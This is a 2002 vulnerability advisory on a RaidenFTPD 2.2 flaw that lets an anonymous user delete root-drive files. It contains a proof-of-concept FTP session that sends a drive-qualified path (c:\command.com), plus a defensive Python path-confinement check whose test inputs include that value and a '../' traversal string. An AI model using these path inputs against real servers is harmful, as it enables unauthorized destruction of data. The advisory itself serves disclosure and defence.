
File Deletion Vulnerability in RaidenFTPD for Windows

Reported January 14, 2002, by Tamer Sahin.

VERSIONS AFFECTED

  • RaidenFTPD 2.2 for Windows 2000, Windows NT, and Windows 9x

 

DESCRIPTION
A vulnerability in RaidenFTPD 2.2 lets an attacker delete any file located in the root directory of a drive (c:\, d:\, etc.) on the system.

 

DEMONSTRATION

The discoverer posted the following demonstration as proof-of-concept:

 

C:\>ftp 192.168.10.3
Connected to 192.168.10.3.
220-This FTP site is running free version of RaidenFTPD
220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-site/
220-Download english version from http://playstation2.idv.tw/raidenftpd/
220-RaidenFTPD32 for RaidenFTPD (up since 2002/01/13 17:07)
220-This server is for private use only
220-If you do not have access to this server
220-Please disconnect now
220 Please enter your login name now.
User (192.168.10.3:(none)): anonymous
331 Password required for anonymous .
Password:
230-----------------------------------------------------------------------+
230-   lvl=level r=root s=superusers n=normal g=guest * = all userlevels
230-   grp=group n=nukers s=sitebot
230-for more detailed descriptions, please visit raidenftpd homepage
230-http://playstation2.idv.tw/raidenftpd/raiden-ftpd-doc/help-sitecmd.html
230-----------------------------------------------------------------------+
230 User anonymous logged in, proceed.
ftp> get c:\command.com
Error opening local file command.com.
> command.com:Permission denied
ftp> quit
221-
221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
221-                  anonymous , ºAñ¦ñ-ñW¦¦ "0" BYTES, ñU+n "0" BYTES
221-                  +QºA¦ßí@~~~~S·ñ¯~~~~
221-                  ªA¿úíA+w¬nªAª+Ñ·-\{!!!!
221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
221-<This system is running unregistered version of RaidenFTPD>.
221 Goodbye.

 

And the file has been deleted!
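
The demonstration depends on the server acting on a drive-qualified path (c:\command.com) supplied by the client. The advisory does not state the root cause, so the following is an added example, not RaidenFTPD code and not part of the original report: a path-confinement check of the kind an FTP server can apply to a client-supplied file argument before touching the filesystem. FTP_ROOT and resolve_in_root are hypothetical names, and the sample arguments are constructed.

```python
import ntpath  # Windows path rules, importable on any OS

FTP_ROOT = r"D:\ftproot"  # constructed value: the only directory meant to be served


def resolve_in_root(arg, cwd="/", root=FTP_ROOT):
    """Map a client-supplied FTP path to a file under root; return None to refuse."""
    if not arg or "\x00" in arg:
        return None
    # Drive-qualified (c:\x, c:x) and UNC (\\host\share) arguments name a location
    # outside the FTP root; any other ':' would be an alternate data stream.
    drive, _ = ntpath.splitdrive(arg)
    if drive or ":" in arg:
        return None
    virt = arg.replace("\\", "/")
    if not virt.startswith("/"):          # relative to the session's virtual cwd
        virt = cwd.rstrip("/") + "/" + virt
    parts = []
    for comp in virt.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:                 # would climb above the virtual root
                return None
            parts.pop()
        elif not comp.strip(". "):        # "...", " " and similar dot/space names
            return None
        else:
            parts.append(comp)
    full = ntpath.normpath(ntpath.join(root, *parts))
    # Belt and braces: the resolved path must still sit at or below root.
    base = ntpath.normcase(ntpath.normpath(root))
    got = ntpath.normcase(full)
    if got != base and not got.startswith(base + "\\"):
        return None
    return full


if __name__ == "__main__":
    # Constructed arguments; the first is the one from the demonstration.
    for arg in (r"c:\command.com", "pub/readme.txt", "../command.com"):
        path = resolve_in_root(arg)
        print(f"RETR {arg!r:22} ->", path or "550 refused")
```

The check refuses the argument from the demonstration outright and only returns paths that resolve at or below the configured root.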

 

 

VENDOR RESPONSE

The vendor, RaidenFTPD, has been notified but hasn't issued a patch.

 

CREDIT
Discovered by Tamer Sahin of Security Office.
